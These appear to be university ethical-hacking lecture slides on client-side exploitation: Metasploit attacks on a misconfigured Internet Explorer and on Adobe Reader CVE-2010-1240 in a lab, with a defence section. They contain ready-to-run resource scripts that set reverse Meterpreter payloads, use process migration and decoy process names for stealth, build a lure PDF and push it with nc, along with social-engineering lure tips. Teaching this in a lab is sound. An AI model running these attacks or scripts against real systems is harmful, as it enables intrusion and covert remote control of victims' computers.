Lecture07B Client Side Exploitation

The lecture on Client Side Exploitation covers the exploitation of vulnerabilities in client software such as browsers and PDF readers, emphasizing the rise of these attacks due to less protection on personal computers. It discusses techniques like social engineering to lure users into connecting to malicious servers or opening harmful files, and provides detailed examples of browser and PDF reader exploitation using Metasploit Framework. The session outlines the steps for executing these attacks and highlights the importance of user awareness in preventing such exploits.


INFO3002 Ethical Hacking Principles and Practice

Lecture 7B: Client Side Exploitation

School of Computer, Data and Mathematical Sciences, Western Sydney University

Lecture outline
■ What is Client Side Exploitation
■ Browser Exploitation
■ PDF Reader Exploitation

Recall: Client/Server Architecture
■ Many services on the Internet are provided via the client/server architecture.
■ Previously, we looked at exploiting vulnerabilities in server software: SMB servers, FTP servers, etc.
■ The client software can have vulnerabilities as well!

Client Side Exploitation
■ Exploiting vulnerabilities in client software such as browsers, email clients, PDF readers, etc. The attacks are typically performed by
▬ creating a malicious server,
▬ or making a vulnerable server malicious for the clients that connect to it,
▬ or generating malicious files for the clients to open.
■ Client side exploitation is on the rise:
▬ Servers are usually tightly protected today, but personal computers often are not.
▬ There are a huge number of personal computers, so the attack surface is large.

Social Engineering
■ Besides creating the malicious server or file, an essential step in client side exploitation is to trick users into connecting to the malicious server or opening the malicious file.
▬ This step is typically performed by Social Engineering.
■ In the context of information security, Social Engineering means the social or psychological techniques that manipulate people into performing unwise actions.
▬ It mainly uses psychological or social techniques, not computer techniques.

Social Engineering Examples
■ Dropping USB sticks containing malicious files around the locations of the targets.
■ Enticing people to click a malicious link by disguising it as a link to a gift, voucher, etc.
■ Sending emails that appear to come from the boss, the government, the police, etc.

Assumption
■ In this lecture, we'll assume the social engineering step is successful.
▬ That is, a user has been successfully lured into connecting to a malicious server or opening a malicious file.
■ Social engineering itself is a big topic. If you are interested, you can refer to the following Wikipedia page and its linked pages:
▬ https://en.wikipedia.org/wiki/Social_engineering_(security)
■ This lecture will focus on:
▬ How to create a malicious server or file.

Types of Client Side Exploitation
■ One typical classification of client side exploitation is based on the client software exploited:
▬ Browser exploitation
▬ Email client exploitation
▬ PDF Reader exploitation
▬ MS Office exploitation
▬ And much more
We'll talk about two types in this lecture: Browser exploitation and PDF Reader exploitation.

Lecture outline
■ What is Client Side Exploitation
■ Browser Exploitation
■ PDF Reader Exploitation

Browser exploitation – Overview
■ First, create a web page containing malicious JavaScript, or another type of code that browsers will run.
■ Then, lure users into visiting this web page.
■ The malicious code exploits a vulnerability (or, as in our example, a dangerous misconfiguration) in the browser to gain unauthorized access to the user's computer.

Browser exploitation – Example
■ In this example, we'll exploit a misconfiguration in the IE browser.
▬ This misconfiguration allows remote code execution if a user views a specially crafted web page.
▬ A misconfiguration is not a vulnerability, but it can be as deadly as one: here the browser is simply configured to do what the attacker wants.
■ The misconfiguration is setting 'Initialize and script ActiveX controls not marked as safe' in IE to 'Enabled'. Its secure default is 'Disable'; with 'Enabled', any web page may create and script ActiveX objects that were never meant to be exposed to web content (for example, ones that can write files to disk and run them).
▬ Here 'script' is a verb.
▬ In Internet Explorer, click Tools -> Internet Options -> Security -> Custom Level -> Initialize and script ActiveX controls not marked as safe -> Enable.
▬ We have done this in the IE on our Win7 VM.

Browser exploitation example (cntd)
■ We need to start MSF first.
▬ sudo service postgresql start
▬ sudo msfconsole
NB: 'sudo' is necessary here because the malicious web server will bind to port 80, and binding to ports below 1024 requires root. Without it, msfconsole still runs but the exploit cannot open that port.
■ Next, we'll demo the 8 steps of using MSF to exploit this misconfiguration.

Step 1. Search for the exploit
■ Suppose we know that our target is using an IE browser with this misconfiguration.
■ We search for a matching exploit in MSF.

Step 2. Select the exploit
■ Suppose we select the exploit with Index 0 from the returned results.
■ NB:
▬ the payload defaults to windows/meterpreter/reverse_tcp.
▬ 'windows/meterpreter/reverse_tcp' is a 32-bit payload; it runs on both 32-bit and 64-bit Windows (on 64-bit Windows it runs as a 32-bit process under WoW64). 'windows/x64/meterpreter/reverse_tcp' is a 64-bit payload and runs only on 64-bit Windows.

Step 3. Set payload
■ Since we know our Win7 VM uses a 64-bit OS, it is better to set the payload to 'windows/x64/meterpreter/reverse_tcp': a 64-bit Meterpreter is more reliable on a 64-bit target and can migrate into native 64-bit processes.

Step 4. Show exploit and payload options
■ Enter 'show options' to list the exploit's options together with the payload's options (LHOST, LPORT).

Step 5. Set options
Different from server side exploitation, we encounter the following new options:
■ SRVHOST: in case the attacking computer has several network interfaces, this option specifies on which interface the malicious web server will listen.
▬ Its default value '0.0.0.0' means the web server will listen on all interfaces of the computer. You can keep this default untouched.
▬ Recall that in the output of the Linux command 'ss', '0.0.0.0:80' likewise means that a program is listening on port 80 on all IP addresses of this computer.
■ SRVPORT: the port number the malicious web server will listen on.
▬ Its default is 8080.
▬ To make the URL look less suspicious, it's better to set it to 80 (which is why msfconsole was started under sudo).

Step 5. Set options (cntd)
■ URIPATH: the path part of the malicious URI (or URL) to send to the target.
▬ That is, the part after the host name in the URL.
▬ Its default value is random, meaning a random path name will be generated.
▬ To entice the target effectively, give it an enticing name such as 'freegift', 'prize', etc.
■ ALLOWPROMPT: allow the IE browser to prompt the user before running the potentially harmful script.
▬ Its default is 'false'.
▬ We need to set it to 'true' here, otherwise the attack won't succeed in our setup.

Step 5. Set options (cntd)
Recall: LHOST and LPORT are the IP address and port number the reverse Meterpreter connects back to. msfconsole has already filled them in sensibly (LHOST is the IP of Kali's primary interface and LPORT is 4444), as shown in Step 4, so we don't need to modify them here.

Step 6. Launch the attack
■ Simply enter 'exploit'
▬ The web server will start listening on port 80 to serve the malicious page: http://192.168.76.129/prize
▬ The Meterpreter handler will start listening on port 4444.

Step 7. Our target clicks the malicious link
■ Suppose an innocent user on Win7 clicks this malicious link.
■ And clicks the 'Allow' button in the subsequent dialogue box if prompted by IE.
■ Check the progress on the Kali VM while the IE browser is still "thinking".

Step 8. MSF starts to exploit; and a Meterpreter session is opened
■ After the Meterpreter session is opened, enter 'sessions -i <session number>' to interact with that session.
■ NB: If you are not sure whether a Meterpreter session was opened, enter 'sessions' to list the current sessions.

Summary of the previous exploitation
■ If you do 'sudo ss -antp' on Kali, you'll see that Kali has both port 80 and port 4444 listening.
■ The two connections involved (Kali machine on one side, target machine on the other):
▬ HTTP connection: the target's browser connects to the malicious web server on Kali at port 80.
▬ Meterpreter connection: the Meterpreter payload on the target connects back to the Meterpreter handler on Kali at port 4444.

Notes on the previous exploitation
■ Meterpreter acquires the same privilege as IE, as it is launched through IE.
▬ If the target logs in with an administrator account, IE (and hence Meterpreter) runs with that account's rights. If the target uses a limited user account, IE only has limited privilege.
o Caveat: on Win7 with UAC enabled, even an administrator's IE runs with a filtered, medium-integrity token, so a Meterpreter obtained this way still needs a UAC bypass or elevation before it has full administrator rights.
o This is why people should log in to their computers with limited user accounts instead of administrator accounts.
■ In this example, the target logs into Win7 as 'alex' and runs IE, so the Meterpreter has the same privilege as 'alex'.

Refinement of the previous exploitation
■ If you do 'getpid' and then 'ps' in the Meterpreter session obtained previously, you'll see that the Meterpreter is running in a new process with a random name, 'IQtverm…exe', and PID 3656. This is not very stealthy: a randomly named executable is easy to spot in the process list.

Refinement of the exploitation (cntd)
■ To get rid of this process, a skilled hacker migrates Meterpreter into another process immediately after the exploitation of IE succeeds.
■ To achieve this, the hacker sets the following advanced options of the Meterpreter payload in Step 5. Advanced options are displayed by 'show advanced'.
▬ PrependMigrate: whether to migrate Meterpreter to a new process as soon as the payload starts.
▬ PrependMigrateProc: the name of the program to spawn and migrate into.
Choosing 'explorer.exe' (Windows Explorer) blends in well, as a real explorer.exe is always running for a logged-in user, so a second copy attracts little attention.

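The 8 steps above, together with the PrependMigrate refinement, can be driven from a Metasploit resource script so the options are set identically on every run. The script below is an added example and not code from the lecture; it assumes that the module selected at Index 0 is exploit/windows/browser/ie_unsafe_scripting (the slides never name the module) and that Kali's address is 192.168.76.129, as in the slides' URL. Every value it writes is one the slides set by hand.

```shell
#!/bin/sh
# Added example, not from the lecture: the browser attack (Steps 1-8 plus the
# PrependMigrate refinement) as a Metasploit resource script, so every option
# is set the same way each run.
# ASSUMPTIONS: the module selected at "Index 0" is
# exploit/windows/browser/ie_unsafe_scripting (the slides never name it), and
# Kali's address is 192.168.76.129 as in the slides' URL.
set -e

LHOST="${LHOST:-192.168.76.129}"   # Kali IP the Meterpreter connects back to (assumed)
LPORT="${LPORT:-4444}"
SRVPORT="${SRVPORT:-80}"           # < 1024, hence msfconsole must run under sudo
URIPATH="${URIPATH:-prize}"

# write_browser_rc OUTFILE : write the resource script, print its path
write_browser_rc() {
  cat > "$1" <<EOF
use exploit/windows/browser/ie_unsafe_scripting
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set SRVHOST 0.0.0.0
set SRVPORT ${SRVPORT}
set URIPATH ${URIPATH}
set ALLOWPROMPT true
set LHOST ${LHOST}
set LPORT ${LPORT}
set PrependMigrate true
set PrependMigrateProc explorer.exe
exploit -j
EOF
  printf '%s\n' "$1"
}

# rc_value FILE KEY : print the value that a "set KEY value" line gives in FILE
rc_value() {
  while read -r cmd key val; do
    [ "$cmd" = "set" ] && [ "$key" = "$2" ] && { printf '%s\n' "$val"; return 0; }
  done < "$1"
  return 0
}

# malicious_url : the link to send the target, derived from the same variables
malicious_url() {
  if [ "$SRVPORT" = "80" ]; then
    printf 'http://%s/%s\n' "$LHOST" "$URIPATH"
  else
    printf 'http://%s:%s/%s\n' "$LHOST" "$SRVPORT" "$URIPATH"
  fi
}

main() {
  rc="$(write_browser_rc "${TMPDIR:-/tmp}/ie_browser.rc")"
  echo "Resource script: $rc"
  echo "Send the target: $(malicious_url)"
  # Only start Metasploit when asked; 'exploit -j' runs server + handler as a
  # background job, leaving the console free for 'sessions -i <n>'.
  if [ "${RUN_MSF:-0}" = 1 ]; then
    sudo msfconsole -q -r "$rc"
  fi
}
main
```

Running the script writes ie_browser.rc and prints the URL to send to the target; RUN_MSF=1 additionally launches 'sudo msfconsole -q -r ie_browser.rc'. Because 'exploit -j' backgrounds the web server and the handler, the console stays free for 'sessions' and 'sessions -i <n>' once the target visits the page.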
Result of the refinement
■ Meterpreter migrates to explorer.exe.
■ The explorer.exe into which Meterpreter migrates is newly created, so you'll see two explorer.exe processes.
meterpreter > getpid
Current pid: 2112

meterpreter > ps -S explorer

PID PPID Name User Path
2112 1348 explorer.exe alex C:\Windows\SysWOW64\explorer.exe
2576 2536 explorer.exe alex C:\Windows\explorer.exe

■ The other one, with a different PID (2576), is the true explorer.exe process.
■ Note the path: the spawned copy is C:\Windows\SysWOW64\explorer.exe, i.e. a 32-bit process, whereas the genuine shell on 64-bit Windows is the 64-bit C:\Windows\explorer.exe. An explorer.exe running from SysWOW64 is a tell a defender can look for.

Further refinement
■ You can manually migrate Meterpreter into the true explorer.exe after you get the Meterpreter session. Then, the fake explorer.exe from the previous slide disappears.
meterpreter > migrate 2576
[*] Migrating from 2112 to 2576...
[*] Migration completed successfully.

meterpreter > ps -S explorer

PID PPID Name User Path
2576 2536 explorer.exe alex C:\Windows\explorer.exe

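A defender's view of the two slides above, as an added example that is not part of the lecture: a small shell audit over a Meterpreter-style 'ps' listing that flags an explorer.exe running from any path other than C:\Windows\explorer.exe (the SysWOW64 copy is the spawned host), look-alike names such as iexplorer.exe (the EXENAME chosen later in the PDF example; the real IE binary is iexplore.exe), and svchost.exe outside System32. The listing is constructed for this example, modelled on the 'ps -S explorer' output above. Once Meterpreter has migrated into the genuine explorer.exe (PID 2576) this check no longer fires; from then on the evidence is the outbound connection to port 4444 from explorer.exe, not the process list.

```shell
#!/bin/sh
# Added example (not from the lecture): spot the "fake" explorer.exe and
# look-alike process names in a Meterpreter-style `ps` listing.
# The listing below is CONSTRUCTED for this example, modelled on the
# `ps -S explorer` output in the slides (PIDs 2112/2576 for explorer.exe).
set -e

sample_ps() {
  cat <<'EOF'
PID  PPID Name           User   Path
2112 1348 explorer.exe   alex   C:\Windows\SysWOW64\explorer.exe
2576 2536 explorer.exe   alex   C:\Windows\explorer.exe
3104 2576 iexplore.exe   alex   C:\Program Files\Internet Explorer\iexplore.exe
3656 3104 iexplorer.exe  alex   C:\Users\alex\AppData\Local\Temp\iexplorer.exe
480  4    svchost.exe    SYSTEM C:\Windows\System32\svchost.exe
3812 2576 svchost.exe    alex   C:\Users\alex\Documents\svchost.exe
EOF
}

# audit_ps: read "PID PPID Name User Path" lines on stdin and print one
# "FLAG <pid> <name> <reason>" line per suspicious process.
audit_ps() {
  while read -r pid ppid name user path; do
    [ "$pid" = "PID" ] && continue          # skip the header line
    case "$name" in
      explorer.exe)
        # The genuine shell is C:\Windows\explorer.exe (64-bit on x64 Windows);
        # a SysWOW64 copy is a 32-bit process, i.e. a spawned host for a payload.
        [ "$path" = 'C:\Windows\explorer.exe' ] ||
          printf 'FLAG %s %s explorer.exe outside C:\\Windows (%s)\n' "$pid" "$name" "$path"
        ;;
      iexplorer.exe)
        # IE's real binary is iexplore.exe; the extra "r" is a decoy name.
        printf 'FLAG %s %s look-alike of iexplore.exe (%s)\n' "$pid" "$name" "$path"
        ;;
      svchost.exe)
        case "$path" in
          'C:\Windows\System32\'*) ;;     # expected location
          *) printf 'FLAG %s %s svchost.exe outside System32 (%s)\n' "$pid" "$name" "$path" ;;
        esac
        ;;
    esac
  done
}

# count_suspicious: count the FLAG lines fed on stdin
count_suspicious() {
  n=0
  while IFS= read -r _line; do n=$((n + 1)); done
  printf '%d\n' "$n"
}

# Stand-alone run: print the flagged processes from the constructed listing.
sample_ps | audit_ps
```

On a real engagement the listing would come from the Meterpreter 'ps' output (or from the target's own task list) instead of sample_ps; the rules stay the same.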
Lecture outline
■ What is Client Side Exploitation
■ Browser Exploitation
■ PDF Reader Exploitation

PDF Reader exploitation – Overview
■ Create a PDF file containing malicious code.
■ Lure users into opening this PDF file.
■ The malicious code inside the PDF file exploits a vulnerability in the PDF reader to gain unauthorized access to the user's computer.

PDF Reader exploitation – Example
■ In this example, we'll exploit a vulnerability in Adobe Reader before v9.3.3.
▬ The vulnerability is that one text field in the Launch File warning dialog is not sanitized, so an attacker can craft a PDF whose Launch action runs an arbitrary local program while the dialog shows attacker-chosen text that persuades the user to click through.
▬ CVE ID: CVE-2010-1240.
▬ For more info about this vulnerability, see: https://www.cvedetails.com/cve/CVE-2010-1240/
■ Next, we'll demo the 10 steps of using MSF to exploit this vulnerability.

Step 1. Search for the exploit
■ Suppose we know that our Win7 VM is using Adobe Reader v9.2.
■ We search for the exploit by using the CVE ID (search cve:2010-1240).

Step 2. Select the exploit
■ Our experience suggests that the exploit with index 1 has a larger chance of success, so we'll select it in our demo.
■ NB:
▬ the payload defaults to windows/meterpreter/reverse_tcp.
▬ 'windows/meterpreter/reverse_tcp' is a 32-bit payload that runs on both 32-bit and 64-bit Windows (under WoW64 on the latter); 'windows/x64/meterpreter/reverse_tcp' runs only on 64-bit Windows.

Step 3. Set payload
■ Since we know our Win7 VM uses a 64-bit OS, it is better to set the payload to 'windows/x64/meterpreter/reverse_tcp', which is more reliable in our scenario.
msf6 > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

Step 4. Show exploit and payload options
■ Enter 'show options'.

Step 5. Set options
■ EXENAME: the name of the executable that carries the Meterpreter, i.e. the process name that shows up on the target.
▬ A hacker chooses a deceptive name rather than the default, e.g. iexplorer.exe, svchost.exe, etc. Note that the genuine IE binary is iexplore.exe (no 'r'); a look-alike name fools a casual glance but is a clear indicator for a defender who knows the real names and paths.
■ FILENAME: the name of the malicious PDF file to be generated.
▬ A hacker chooses an attractive name rather than the default, e.g. payslip.pdf, voucher.pdf, etc.
■ LAUNCH_MESSAGE: the message shown in the Launch File dialog before the user opens this PDF file.
▬ We accept its default value here.

Step 6. Generate the malicious file
■ Simply enter 'exploit' or 'run'
▬ 'run' is an alias for 'exploit'.
▬ The malicious PDF file named voucher.pdf will be generated; msfconsole prints where it was saved (see Step 8).

Step 7. Create a handler to receive the reverse Meterpreter connection
■ This is done through the module exploit/multi/handler.
▬ With the proper payload set, this module creates a handler (a server) that waits for connection requests from Meterpreter sessions, shell sessions, HTTP sessions, etc.
■ We need to use this module: use exploit/multi/handler
■ See the next slide on how to set its payload and options.

Step 7. Create a handler to receive the reverse Meterpreter connection (cont'd)
■ Usually we cannot accept its default payload.
■ We need to set the handler's payload and options (LHOST, LPORT) exactly the same as those used when we generated the malicious PDF; otherwise the connection back either goes unanswered or is not understood by the handler.
■ Then, we start this handler to wait for Meterpreter's reverse connection.

Note to Step 7
■ This step simply creates a Meterpreter handler to receive the reverse connection.
■ This step was not needed in the previous example of Browser exploitation, as the handler was created automatically by the exploit module there.
■ Here the adobe_pdf_embedded_exe_nojs module only writes a file and doesn't do this for us, so we need to create the Meterpreter handler ourselves.

Step 8. Send the pdf file to the target
■ Suppose we use some social engineering technique such that the target downloads voucher.pdf to his/her "Documents" directory.
■ In our lab, we can use nc to upload voucher.pdf from Kali to Win7.
■ Because msfconsole was run under sudo, voucher.pdf is stored in root's MSF directory /root/.msf4/local/, which requires root privilege to access, so we need a Linux shell under the root account first.
■ This can be done with the 'sudo zsh' command, where 'zsh' is the default shell program of Kali Linux.
▬ See the next slide.

Step 8. Send the pdf file to the target (cntd)
■ A shell under root is obtained. A root shell has the prompt symbol '#'.
■ Then, change to the /root/.msf4/local directory.
■ Then, use nc to upload voucher.pdf to the target's Documents folder.

Step 9. Target opens this malicious file
■ Adobe Reader prompts the user to confirm 'Open'. Here we assume that the user fully trusts this file and will open it.

Step 9. Target opens this file (cntd)
■ After the user clicks the 'Open' button, the Meterpreter payload embedded in the PDF runs and initiates a connection to the waiting handler on Kali.
■ NB: Adobe Reader will show a blank PDF. If you want to generate a PDF with some content, it can be achieved with the advanced options of the adobe_pdf_embedded_exe_nojs module. You are welcome to explore this by yourself.

Step 10. On Kali, the Meterpreter handler receives the connection
■ The Meterpreter connects back to the handler on Kali, so a Meterpreter shell is successfully obtained.

Step 10. On Kali, the Meterpreter handler receives the connection (cntd)
■ We can check the user account, process ID, process name, etc. (getuid, getpid, ps).
■ We see that the process name is indeed the one we specified: iexplorer.exe.

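The PDF procedure has two halves that must agree: the builder (Steps 3-6) and the handler (Step 7). The following added example, which is not code from the lecture, generates both resource scripts from one set of variables and then checks that the handler's PAYLOAD, LHOST and LPORT match the file that was built, which is exactly the mistake Step 7 warns about. It assumes Kali is 192.168.76.129, that the builder module is the exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs module named in the slides (with the EXENAME/FILENAME options of Step 5), and, for the optional transfer, that a netcat listener on the Win7 side is writing to voucher.pdf in the Documents folder (the slides only say nc was used).

```shell
#!/bin/sh
# Added example (not from the lecture): generate the PDF-builder and the
# multi/handler resource scripts from ONE set of variables, and verify that
# the handler's PAYLOAD/LHOST/LPORT match the PDF that was built.
# ASSUMPTIONS: Kali is 192.168.76.129; the builder module is the
# exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs module named in the
# slides; the Win7 side runs an nc listener that writes to Documents\voucher.pdf.
set -e

PAYLOAD="${PAYLOAD:-windows/x64/meterpreter/reverse_tcp}"
LHOST="${LHOST:-192.168.76.129}"
LPORT="${LPORT:-4444}"
OUTDIR="${OUTDIR:-${TMPDIR:-/tmp}}"

# write_build_rc OUT PAYLOAD LHOST LPORT : resource script that builds voucher.pdf
write_build_rc() {
  cat > "$1" <<EOF
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
set PAYLOAD $2
set LHOST $3
set LPORT $4
set EXENAME iexplorer.exe
set FILENAME voucher.pdf
run
exit
EOF
  printf '%s\n' "$1"
}

# write_handler_rc OUT PAYLOAD LHOST LPORT : resource script for the listener
write_handler_rc() {
  cat > "$1" <<EOF
use exploit/multi/handler
set PAYLOAD $2
set LHOST $3
set LPORT $4
exploit -j
EOF
  printf '%s\n' "$1"
}

# handler_params FILE : the three "set" lines the handler MUST share with the builder
handler_params() {
  grep -E '^set (PAYLOAD|LHOST|LPORT) ' "$1" | sort
}

# rc_match BUILD_RC HANDLER_RC : succeed only if payload, LHOST and LPORT agree
rc_match() {
  [ "$(handler_params "$1")" = "$(handler_params "$2")" ]
}

main() {
  build="$(write_build_rc "$OUTDIR/pdf_build.rc" "$PAYLOAD" "$LHOST" "$LPORT")"
  handler="$(write_handler_rc "$OUTDIR/pdf_handler.rc" "$PAYLOAD" "$LHOST" "$LPORT")"
  rc_match "$build" "$handler" || { echo "handler does not match builder" >&2; exit 1; }
  echo "builder: $build"
  echo "handler: $handler"
  if [ "${RUN_MSF:-0}" = 1 ]; then
    # Under sudo, as in the lecture, so the PDF lands in /root/.msf4/local/.
    sudo msfconsole -q -r "$build"
    # Lab-only transfer; assumes `nc -l -p 9999 > voucher.pdf` running in the
    # target's Documents folder (WIN7_IP must be set by the caller).
    sudo sh -c "nc -w 3 ${WIN7_IP:?set WIN7_IP} 9999 < /root/.msf4/local/voucher.pdf"
    # Start the matching listener, then wait for the user to click 'Open'.
    sudo msfconsole -q -r "$handler"
  fi
}
main
```

Without RUN_MSF the script only writes the two resource files and proves they agree; with RUN_MSF=1 and WIN7_IP set it builds the PDF, pushes it over nc and then starts the handler. Deriving both files from the same PAYLOAD/LHOST/LPORT variables is what makes the Step 7 requirement hold by construction rather than by retyping.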
Defence against client-side exploitation
■ Don't click suspicious links or open suspicious files, and treat every 'Allow' or 'Open' prompt from the browser or PDF reader as a warning rather than a formality.
■ Update your software to the latest version (CVE-2010-1240 was fixed in Adobe Reader 9.3.3).
■ Don't weaken secure defaults: leave 'Initialize and script ActiveX controls not marked as safe' at 'Disable' in IE, and in Adobe Reader keep 'Allow opening of non-PDF file attachments with external applications' unchecked (Edit -> Preferences -> Trust Manager), which blocks the Launch action used above.
■ Use a limited user account for daily work, so a successful client-side exploit does not inherit administrator rights.
■ Install anti-virus software.

Example Short Answer Question:
■ What is social engineering? Also, give some examples of
social engineering.

Lecture Summary
■ Netcat is a lightweight multi-purpose networking tool,
nicknamed ‘Swiss Army Knife’.
■ Client-side attacks are very popular today, because client-
side programs are used by everybody.
■ MSF can easily succeed in client-side attacks if client-side
programs are not well protected.

References
■ Online Tutorial from Offensive Security: Metasploit Unleashed
▬ https://www.offensive-security.com/metasploit-unleashed/
■ The web links mentioned in the slides of this lecture